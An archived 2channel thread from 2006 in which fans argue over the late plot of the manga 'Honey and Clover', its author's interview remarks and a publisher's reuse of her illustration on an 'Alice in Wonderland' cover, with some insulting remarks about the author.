888 :花と名無しさん:2006/08/16(水) 14:07:11 ID:???0
便所紙レベルの糞とかいう人はアンチスレに行ってね

889 :花と名無しさん:2006/08/16(水) 14:11:31 ID:???0
>>884
理解不能でワケワカラン。
逆に一人でも大丈夫だからと、修からも森田からも竹本からも巣立って
何とかしながら踏ん張って生きていこうとした方がよっぽど共感を得られるんじゃないかと思った。

それこそ、最初言っていたように一人で田舎に引っ込んで細々と絵を描いて暮らしながらも
心はものすごく充実しています、って方がよっぽど良かった。

890 :花と名無しさん:2006/08/16(水) 14:45:05 ID:???0
>>884
モノ作って生活してるけど、作品展開よりインタビューにポカーンとなった。
ある層とある層の読者を線引きしちゃうのは、どうなんだろう?

読者が皆、自分の思う道に進んでモノ作ってるワケじゃないから
あんな風にいうなら、発表の場を選ぶべきだったのでは?と思う。

891 :花と名無しさん:2006/08/16(水) 14:49:43 ID:???0
>>888
1〜8までが好きだった人ってどこにいったらいいんだろうね?
教えてくれない?

892 :花と名無しさん:2006/08/16(水) 15:06:04 ID:???0
記憶しておくがいい、きみを侮辱するものは、きみを罵ったり、なぐったりする者ではなく、
これらの人から侮辱されていると思うその思惑なのだ。それでだれかがきみを怒らすならば、
きみの考えがきみを怒らせたのだと知るがいい。だから第一に、心像に奪い去られぬように
したまえ。なぜなら、もしきみがひとたび考える時間と猶予とを得るならば、容易にきみ自身
に打ち勝つだろうから。

893 :花と名無しさん:2006/08/16(水) 15:09:24 ID:???0
>>890
モノ作ってる人なら作品以外の情報で評価してほしくなくね?


894 :花と名無しさん:2006/08/16(水) 15:14:15 ID:???0
>>842
なにこれ・・・ネタじゃないよね?
漫画家として恥を知ったほうがいいよ羽海野さん


895 :花と名無しさん:2006/08/16(水) 15:17:18 ID:???0
>>888
マンセー以外禁止スレ作って出て行ったほうが早いんじゃないかな。

896 :花と名無しさん:2006/08/16(水) 16:16:16 ID:???0
散々出尽くした意見だけど。
創作に携わっていない読者でも、作者が作品の外で語っている内容については
「作品を通してというか、作品の中だけで思う存分語って欲しかった」と普通に思っているのでは。

ただ実際、この漫画に限らず製作者や現場の人間には
あまり頻繁に外部で喋らせるべきじゃないのは確かだな。
「オイオイそれはまだバラしちゃダメだろう('A`)」な発言を平気でするのがあまりにも多いから。

897 :花と名無しさん:2006/08/16(水) 16:20:57 ID:SOg3XCUlO
つかさ アニメはシナリオに参加して ゆっくり丁寧に追加して書いたらどうだったんだろうか。2クールにして。アニメにされてない話も入れたら可能だったはず
もう無理だが

898 :花と名無しさん:2006/08/16(水) 16:22:13 ID:???0
でも2クールとか勝手に決められないよね。

899 :花と名無しさん:2006/08/16(水) 16:23:33 ID:???0
竹本とはぐって合わなくない?
なんではぐなんて好きになったんだろうね。

900 :花と名無しさん:2006/08/16(水) 16:24:35 ID:???0
漫画より映画のほうがよかった

901 :花と名無しさん:2006/08/16(水) 16:37:36 ID:???0
合う合わないで好きになったわけじゃない
竹本の一目ぼれなんだから仕方がない

902 :花と名無しさん:2006/08/16(水) 17:09:56 ID:???0
「モノ作ってる人じゃないと自分の作品は理解できないでしょう」
みたいなことって、モノ作ってる人は絶対言ってはいけないことだ。

たとえば、作品づくりをする人じゃないと
フィクション作品のよさを理解できない
なんてことは絶対にない。
映画を撮らない一般の人達でも映画のよさを理解したり
酷い映画作品には批判したりできるように。
むしろ、モノ作ってる人のほうが
同族嫌悪や仲間意識や自己満足で目が曇ることだってあるのに。
(ハチクロアニメのザリガニオープニングの映像なんか
 視聴者のことを考えない
 芸術系の人達の自己満足で目が曇った作りだろう。)

ウミノ☆さんは同人に帰れ。最悪だ。

903 :花と名無しさん:2006/08/16(水) 17:16:33 ID:???0
絶対の好きな人だなあ

904 :花と名無しさん:2006/08/16(水) 17:20:07 ID:???0
映画は思ったよりは良かった
忘れられたハチクロのいいところを再現してくれたようだった

905 :花と名無しさん:2006/08/16(水) 17:22:54 ID:???0
>>893
ウミノたんがそう思ってるのならインタビューなんかで
こんなこと語らなくね?

906 :花と名無しさん:2006/08/16(水) 17:32:41 ID:???0
>>905
はぁ?スポーツ選手は試合以外でもインタビュー答えるけど
それがその人の選手としての評価にはならないじゃん。
作家だって基本は作品だよ。
インタビューなんて注意してこちらから情報取りに行かなければ入らないものじゃん。


907 :花と名無しさん:2006/08/16(水) 17:40:43 ID:???0
とにかく才能ある人とない人の
線引きがしたくてたまんない人なんだねウミノたん。

908 :花と名無しさん:2006/08/16(水) 17:44:40 ID:???0
まさか才能ある人間と同じステージにいたいの?
ネットやなんだで自由に意見いえるのはいいけど
線引きが嫌みたいなゆとり教育ばりの左翼的平等感って勘弁してほしいわ。
才能ある人間の足をこういう凡人が引っぱるんだよね。


909 :花と名無しさん:2006/08/16(水) 17:48:48 ID:???0
>>906
スポーツ選手でもモノ作りの人でも結果や中身で判断してほしいのなら
言い訳がましい発言はしないだろ
単にインタビューに答えることを言ってるのではなくて
インタビューの中身の話だよ

910 :花と名無しさん:2006/08/16(水) 17:59:56 ID:???0
>>886
便所紙が糞だったら、尻を拭くのに困るね

コンビニのダイジェスト版みたいなのを買ってみた
それでさえ「うへぇ」だったのに、これからも尚 うへぇ展開になるのか
ネカフェでも行って、続きを読みたいと思う
(ローマイヤ先輩とか、ああいった横道ストーリーは面白かった)

911 :花と名無しさん:2006/08/16(水) 18:02:55 ID:???0
コンビニ版見たら山田が…
映画の山田のほうがいいな。

912 :花と名無しさん:2006/08/16(水) 18:05:14 ID:???0
原作派は映画で現実逃避したほうがいいかもね

913 :花と名無しさん:2006/08/16(水) 18:08:49 ID:???0
>>867
*羽海野さんが*傍観者だと思おうとしていたのに
修もみんなと同じになって飛び込む事で大好きだーと言える様になった。と読むと
修を傍観者で通したかった羽海野さんが誰か(読者・編集)の影響で
予定を変更したということを暗に言いたいのかと勘ぐりたくなる。

突然修はぐで暴走してそのあと慌てて軌道修正した漫画を描いておいて
最終話の前にそういうコメントをするとは・・・いやはや

914 :花と名無しさん:2006/08/16(水) 18:09:07 ID:???O
膿野は自分が才能あるとでも思ってるのかね。
コネデビューのくせに。

915 :花と名無しさん:2006/08/16(水) 18:13:00 ID:???0
>>906
インタビューならまだいいけど(駄目な部分もあるが)、完結前のコミックスでタイトルの由来を
明かすのは無しだと思った。
元々アルバムタイトルなのはスレ情報やインタビューで聞いてはいたけど
コミクス9巻でアルバムタイトルをつなげただけなのをバラすのは勘弁して欲しかった。
直後のコーラスの最終回ハチクロサンドを純粋に楽しめなかったよ…。
舞台の幕間の休憩時間で演出家が「題名は俺の好きな物つなげただけです」
って言うような展開だよ。

916 :花と名無しさん:2006/08/16(水) 18:14:57 ID:???0
>>906
>インタビューなんて注意してこちらから情報取りに行かなければ入らないものじゃん。

この情報化社会にそんな無駄なこと言ってもw
しかも作品について言ってるんだから、ひっくるめて評価する人がいても
仕方ないと思うよ。

なんというか、読者に媚びれとは一切思わないが
発する言葉一つで、捉えられ方が違うのにね・・・と思わせる対談だ。

917 :花と名無しさん:2006/08/16(水) 18:18:39 ID:???0
>>914
>膿野は自分が才能あるとでも思ってるのかね。

そうじゃない?
才能ある人とそうでない人の線引きをしたがるってことは。

>コネデビューのくせに。

まったくだ。

私はハチクロ映画のムックみたいな本を立ち読みしたんだ。
その本にはウミノ☆さんのインタビューはなかったんだけど
ウミノ☆さんをスカウトしたキューティの編集者のコメントが載ってて
どう見ても同人女同士のコネデビューです、ありがとうございましただった。
キューティーの編集者も同人女で
ウミノ☆さんの同人の大ファンだからスカウトしたもよう。

誰か才能のある人☆やら
ウミノが好きそうなミュージシャンやらが
ハチクロの説得力のある批判文を書いてくれないかな。
2ちゃんねらーが批判しても
ウミノ☆は「森田好きや竹本好きの子達が何かほえてるわ、ハナホジ」
くらいにしか受け取らないと思うんだよね。

918 :花と名無しさん:2006/08/16(水) 18:30:01 ID:???0
ウミノさんは「持つ者」ってことか…
私は「持たざる者」としてハチクロ読んで、
カオルとか根岸のおじさんのとこで共感できたけど、
やっぱり線引きされたって思っちゃうと複雑だね。

そして>>915に同意。

919 :花と名無しさん:2006/08/16(水) 18:32:00 ID:???0
ウミノさんの漫画に才能あるとは思えないんだけどね…
同人のコネでデビューできて
同人臭のする漫画を応援する人達に
「ハチクロ応援団」などを作られてマンセーされて
そのままトントンと来ちゃっただけじゃん。

920 :花と名無しさん:2006/08/16(水) 18:34:36 ID:???0
絵だけ描いていればよろしい。
ずーっと絵だけ描いててくれればこれからも応援します。

921 :花と名無しさん:2006/08/16(水) 18:38:15 ID:???0
ハチクロの内輪ウケっぽいところが好きじゃなかったんだけど、
ウミノの普通の人は共感できなくてもモノ作りしてる人には分かってもらいたいとの発言で、
この人は内輪ウケっぽくしか描けない人なんだなと納得

922 :花と名無しさん:2006/08/16(水) 18:40:27 ID:???0
反発食らうと思うけど才能は別として
モノ作り(特に芸術関係)携わっている人にしか分からない苦悩はあると思うよ
努力だけではどうにもならない
良い物を創ったと思っても、価値は周囲が決める
しかもその価値は見る側の人によって様々
等、並の神経ではやっていられない

でも
卵を産めなくても、卵が腐っているかどうかは分かる
という言葉があるように
違う生き方をしていても伝わる事や分かる事もある
漫画家なのに、その伝える努力を怠って
分かる人にしか分からない!
と言うのは逃げでしかないと思います

923 :花と名無しさん:2006/08/16(水) 19:25:29 ID:???0

物を作って対価を得て生活している者のはしくれですが
羽海野さんの考えには全く共感できませんが何か?



924 :花と名無しさん:2006/08/16(水) 19:29:39 ID:???0
羽海野って、内輪だけで盛り上がってる
気持ち悪いキャラクターしか描けないじゃん。

925 :花と名無しさん:2006/08/16(水) 19:32:18 ID:???0
>>918
根岸のおじさんはイライラしたなぁw
歳を食えば持たざる者なりの知恵が生まれるわけですよ。それが無い。
あの人は枯れた姿をしたダーク竹本なワケです。そこが嫌い。

926 :花と名無しさん:2006/08/16(水) 19:36:22 ID:???0
>>842が天才してる文の通りだとすると
臭はぐ展開を不満に思ったり困惑してるのは
「気にいらないストーリーだと作者に直接電話するような
 ミザリーのようなストーカーで
 森田厨や竹本厨などのカプ厨」
みたいに読めるなぁ。
そういうふうに思わせたくて、そう羽海野が語ったんだろうけど。

実際は作者に手紙は書いても、電話なんてする人は
ほとんどいないんじゃないか?
作者の電話番号なんて普通知らないじゃないか。

927 :922:2006/08/16(水) 19:51:38 ID:???0
>>923

別に共感出来たとは書いていませんが何か?


928 :923:2006/08/16(水) 19:55:51 ID:???0
>>927
922さんにケンカを売ったんじゃなくて
ウミノさんに「何か?」と言ったんですよ。
気分悪くさせてごめん。

929 :花と名無しさん:2006/08/16(水) 19:58:37 ID:???0
11巻で完結?スピンオフも入れて

930 :花と名無しさん:2006/08/16(水) 19:59:28 ID:???0
ウミノさんの手塗りのカラー画は好きだな。
漫画家やめてイラストレーターに戻ってほしい。

931 :花と名無しさん:2006/08/16(水) 19:59:56 ID:???0
>>921
もう、その思考自体が同人女の思考だよねw
プロの思考じゃない

932 :花と名無しさん:2006/08/16(水) 20:02:07 ID:???0
>>927
>>922に対してじゃなくて
膿のに対してじゃないの?

自意識過剰。

933 :花と名無しさん:2006/08/16(水) 20:07:27 ID:SOg3XCUlO
>>926
いや 作者の電話番号じゃなく 普通編集部とか雑誌とかにだと思うんだが
作者の電話番号わかったら 凄いことになてしまうわな

934 :花と名無しさん:2006/08/16(水) 20:34:49 ID:???0
根岸のおじさん見ると、パトレイバー思い出す。

935 :花と名無しさん:2006/08/16(水) 20:56:43 ID:h4dhMNhI0
>>930
そういや「不思議の国のアリス」文庫の表紙がこいつだった。

最悪絵だった。


936 :花と名無しさん:2006/08/16(水) 21:04:23 ID:???0
「終わりよければ全て良し」なんて言葉があるけど
読後感で一番残るのはやっぱり最後周辺なんだよなぁ
そこで一番失敗してるから途中楽しく読めた部分までなんか台無しって感じ

937 :花と名無しさん:2006/08/16(水) 21:24:36 ID:???0
ハチクロの絵のイメージが強いからイラストレーターとしてもどうかな

938 :花と名無しさん:2006/08/16(水) 21:45:57 ID:???0
>>908
線引きがいやっつうか公の場でそういう見下すような発言する人は
どうかと思うだけさ。

939 :花と名無しさん:2006/08/16(水) 21:57:01 ID:???0
>>938
908が釣りにしても頭悪杉だから、つっこんであげる価値もないので
スルーしてたのに、なんでつっこむのだ。


>>937
膿野さんが描くと何描いてもハチクロキャラにしか見えないもんね…。
膿野さん絵の「グラスハート」だかっていうライトノベルや
大槻ケンヂのエッセイの表紙も、ハチクロキャラにしか見えなかったし。



940 :花と名無しさん:2006/08/16(水) 21:59:50 ID:???0
いつからここはアンチスレになったんだっけ?

941 :花と名無しさん:2006/08/16(水) 22:00:34 ID:???0
マンセーしかしたくないんならmixi行け

942 :花と名無しさん:2006/08/16(水) 22:03:30 ID:???0
>>937
それ以前の問題だよ。

アリスの表紙なんかアリスが黒いクローバー形のヘアピンしてんだぞー……
ウンザリしたわ、あれ。

アリスなのにデカイし。

943 :花と名無しさん:2006/08/16(水) 22:04:53 ID:???0
もえたんの漫画描きも、不思議の国のアリスの絵本を描いてた。
漫画家にこういうの描かせるのってどうなんだろう…。

944 :花と名無しさん:2006/08/16(水) 22:05:44 ID:???0
っつーか、まんま使いまわしイラストなところがもうね・・・

945 :花と名無しさん:2006/08/16(水) 22:07:24 ID:???0
>>935 >>937-942
ググった。
もっと最悪だ。

ハチクロのコミックスの「はぐ」のカラーイラストをそのまま
アリスの表紙に流用。

ttp://right-left.tea-nifty.com/blog/2006/07/_in__de75.html

これは羽海野が悪いというより
集英社も悪いわ。

946 :花と名無しさん:2006/08/16(水) 22:09:34 ID:???0
ハチクロと不思議の国のアリスの表紙の証拠画像
ttp://image.blog.livedoor.jp/ahiru178/imgs/c/e/ceec49e7.jpg

947 :花と名無しさん:2006/08/16(水) 22:13:02 ID:???0
一条ゆかりの一件の対応といい、最悪だわ、集英社。

ハグみたいな偽ロリじゃねえんだよ!アリスは!
あー!もう!昔から好きだった本なのでホント嫌だ。

しかもその安いブルーはディズニーのアリスドレスイメージ?

948 :花と名無しさん:2006/08/16(水) 22:13:36 ID:???0
>>946
スゲェwある意味w

949 :花と名無しさん:2006/08/16(水) 22:16:08 ID:???0
不思議の国のアリスの件はここでいうことでもないだろ
一人で勝手にファビョってアホくさ

ハチクロの内容について語れよ
後半の糞みたいな展開についてとか

950 :花と名無しさん:2006/08/16(水) 22:20:32 ID:???0
>>946
ここまで集英社と膿野のツラノカワが厚いとは

951 :花と名無しさん:2006/08/16(水) 22:21:34 ID:???O
>>946
これがOKなら、アニメ「アルプスの少女ハイジ」のクララも表紙にしろよw

952 :花と名無しさん:2006/08/16(水) 22:23:17 ID:???0
>>946
うわー、使い回しって、比喩じゃなくて、そのものずばりだったのか・・・。
背景色変えただけじゃんww

953 :花と名無しさん:2006/08/16(水) 22:25:52 ID:???0
既に前々から知られてる話だけど、初めてまじまじと見たな。
本題とはずれるけど、これって右腕おかしくない?左腕の袖が太いだけ?

954 :花と名無しさん:2006/08/16(水) 22:26:36 ID:???0
>>949
何をファビョってるの?

作品が殆どこれしかない作家なんだから、関連話題は全部ここでいいんじゃ
ないかなあ。

955 :花と名無しさん:2006/08/16(水) 22:26:55 ID:???0
アリスなんてちっとも興味ないからどんな挿絵でもいいんだけどさ。

この絵、下手だよね。
前から思ってたんだけどさ。

956 :花と名無しさん:2006/08/16(水) 22:28:08 ID:???0
>>954
ここで表紙について文句をつけるんだったら、
ちょっとは言葉を選んだらどうかってことじゃないのかなぁ?
正直なんか不快です・・・。

957 :花と名無しさん:2006/08/16(水) 22:31:18 ID:ONcJM/jq0
>>908
作中にそんなこと書いてない。
評価すべきは作品。
そんなことも理解できないならはなから読まないほうがいい。
あんたみたいな光が見えない人間は何いっても腐臭巻き散らかすから
黙ってなさい。

958 :花と名無しさん:2006/08/16(水) 22:34:10 ID:ONcJM/jq0
>>952
>>951
これなにが問題?
どっちもウミノのイラストとして乗せてるわけだし
だれかの盗作でもない。


959 :花と名無しさん:2006/08/16(水) 22:35:53 ID:???0
>>958
不思議の国のアリスオタが暴れてるだけ
ほっといてやれ

そしてageんな

960 :花と名無しさん:2006/08/16(水) 23:04:07 ID:???O
アリスの本の表紙がアリスじゃないなんて…

961 :花と名無しさん:2006/08/16(水) 23:05:54 ID:???0
ウミノタンは「わかってほしい人」なんだと思う
作品を通してわからせることができないから
インタで語りまくるんだよ
「私を理解して」「可愛いといって」のオンパレード

962 :花と名無しさん:2006/08/16(水) 23:08:52 ID:???0
むしろハチクロ知ってるアリスオタならまだいいと思うよ
でもハチクロ知らない人がこの本を手に取った時、
まさかアリスとは全く関係のない漫画の挿絵だとは思わないよね
そういうところが集英はなんか消費者をなめてる気がする

963 :962:2006/08/16(水) 23:09:53 ID:???0
あ、挿絵じゃない表紙

964 :花と名無しさん:2006/08/16(水) 23:13:10 ID:???0
表紙に関しては羽海野を叩くより集英社に文句を言った方がいいな
ここで羽海野を叩くのはいくらなんでもお門違いだ
羽海野がアタシが描きたいです〜☆とか言ったんならともかく

965 :花と名無しさん:2006/08/16(水) 23:13:21 ID:???0
掴み〜かけた
熱い〜腕を
振りほどいて 君は出てゆく
僅かに震える 白いガウンに 君の
年老いた 悲しみを見た

966 :花と名無しさん:2006/08/16(水) 23:15:02 ID:???0
確かに集英社の考えが浅すぎ
ハチクロでつろうってだけでそ
くだらん

967 :花と名無しさん:2006/08/16(水) 23:21:11 ID:???0
もうアリス絵のことはいいよ…。
文庫の表紙は期間限定のキャンペーンものなんでしょ?
いずれ無くなるものなんでしょ?

集英の「ハチクロ人気に便乗してファンに買わせよう」って魂胆丸見えですが。

968 :花と名無しさん:2006/08/16(水) 23:23:03 ID:???0
ライラライ・・・・・ライラライ・・・・・・・・・・・

969 :花と名無しさん:2006/08/16(水) 23:23:54 ID:???0
アリスにかこつけて叩きたいだけなんじゃないの?
次スレではスルー推奨ね。

970 :花と名無しさん:2006/08/16(水) 23:26:53 ID:???0
帰れるんだ・・・・・これでただの男に
帰れるんだ・・これで帰れるんだ・・・・・・オー

971 :花と名無しさん:2006/08/16(水) 23:30:39 ID:???0
>>969
いや叩きたいとかではなく事実を知って
スルーできないほど結構ビックリした出来事だったのですが・・・
ハチクロというよりハチクロを利用する集英社にだけど
確かにもうこれだけ盛り上がったから次スレではスルーでいいけどさ

972 :花と名無しさん:2006/08/16(水) 23:31:42 ID:???0
くだらねーと思ったことをくだらねーと言うぐらいいいだろうが
2ちゃんなんだし……

973 :花と名無しさん:2006/08/16(水) 23:32:03 ID:???0
あー、私が「漫画家やめてイラストレーターに戻ってほしい」
とか書いたばっかりに…。
こんなことで火がつく人がいるとは思ってなかったよ。
読んでて不快な気分にさせてしまった方々、申し訳ないです。


974 :花と名無しさん:2006/08/16(水) 23:33:39 ID:???0
アリスヲタって怖いんだね・・・怒らすのやめとこ

↓以下ハチクロの話題で・・・

975 :花と名無しさん:2006/08/16(水) 23:37:48 ID:???0
ハチクロオワタ

976 :花と名無しさん:2006/08/16(水) 23:43:13 ID:???0
揚げ足取るとアリスの表紙もハチクロの話題

977 :花と名無しさん:2006/08/16(水) 23:49:21 ID:???0
じゃあアリスの表紙についての文句はどこにカキコすればいいの?
自治厨うざすぎ

978 :花と名無しさん:2006/08/16(水) 23:50:20 ID:???0
>976
たしかに

979 :花と名無しさん:2006/08/16(水) 23:54:31 ID:???0
スルー検定実施中

980 :花と名無しさん:2006/08/16(水) 23:56:00 ID:???0
不思議の国のアリス自体対して面白くも何ともない話だってのは言っちゃダメ?

981 :花と名無しさん:2006/08/17(木) 00:02:26 ID:???0
アリスヲタじゃないけど普通に違和感があったな

例えるならアレだ、司馬遼太郎の新撰組シリーズの表紙と挿絵に
「風光る」の絵がそのまま使われたような、そんな気分にさせられた

982 :花と名無しさん:2006/08/17(木) 00:06:58 ID:AAFqA5jk0
>>968
わかる人はニヤリとし
わからない人はカワイイ絵だなと思う。
どっちでも不利益ないわけだが何が問題?
批判する以上問題点を明確にするべきだ。
流用については出版社と作者がそうするつもりなら問題ない。

さぁ、何が問題か簡潔にのべよ。


983 :花と名無しさん:2006/08/17(木) 00:14:26 ID:???0
ケモノのように挑戦者は
襲いかかる若い力で
やがて君は静かに
倒れて落ちた
疲れて眠るように・・・・
わずかばかりの意識の中で
君は何を考えたのか
立たないで もうそれで充分だ
おお神よ彼を救いたまえ

984 :花と名無しさん:2006/08/17(木) 00:16:25 ID:???0
>>982
お前のレスアンカーが問題だな

985 :花と名無しさん:2006/08/17(木) 00:18:05 ID:???0
ライラライ・・・・・・ライラライ・・・・・
ライラライ・・・・・・・オオオ・・ライラライ

986 :花と名無しさん:2006/08/17(木) 00:19:32 ID:???0
ちんぺー乙

987 :花と名無しさん:2006/08/17(木) 00:20:30 ID:???0
>>968
チンペーーー!!

988 :花と名無しさん:2006/08/17(木) 00:21:34 ID:???0
>>984
激しくワロタwww


989 :花と名無しさん:2006/08/17(木) 00:25:43 ID:???0
ルイス・キャロルって確か幼女の色香に迷ってその母親にぶっとばされたんじゃなかったか。
修はぐの原風景だな。

990 :花と名無しさん:2006/08/17(木) 03:09:39 ID:???0
>>967>>989
なるほどー編集者黒いな
ウミノは隠れロリご用達の絵師になれと
エロい萌え絵だと萌えない層のロリ狙いか

991 :花と名無しさん:2006/08/17(木) 03:25:47 ID:???0
>>990
次スレよろ

992 :花と名無しさん:2006/08/17(木) 04:09:27 ID:???0
羽海野チカ「ハチミツとクローバー」その55
http://comic6.2ch.net/test/read.cgi/gcomic/1155754643/
ツメが甘かった・・・。

993 :花と名無しさん:2006/08/17(木) 06:43:09 ID:KkdOxfSY0
ume

994 :花と名無しさん:2006/08/17(木) 08:51:32 ID:Y647ziXtO
かさ

995 :花と名無しさん:2006/08/17(木) 09:10:49 ID:???O
ハチクロ 10月号
『真山編』
11月号
『野宮山田編』&『はぐ編』
12月号
『森田兄弟編』


996 :花と名無しさん:2006/08/17(木) 09:14:38 ID:???O
さりげなく

997 :花と名無しさん:2006/08/17(木) 09:16:50 ID:BuW2CIK0O
997なら竹本が幸せになり はぐと一緒になる

998 :花と名無しさん:2006/08/17(木) 09:17:48 ID:???O
998なら山田が幸せになる

999 :花と名無しさん:2006/08/17(木) 09:18:28 ID:???O
999なら森田は いつまでも1人

1000 :花と名無しさん:2006/08/17(木) 09:19:37 ID:???O
1000なら森田は死ね
見てるだけで結局美味しいとこはもっていっちゃう 才能だけの最悪なやつ
竹本かわいそす

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

223 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)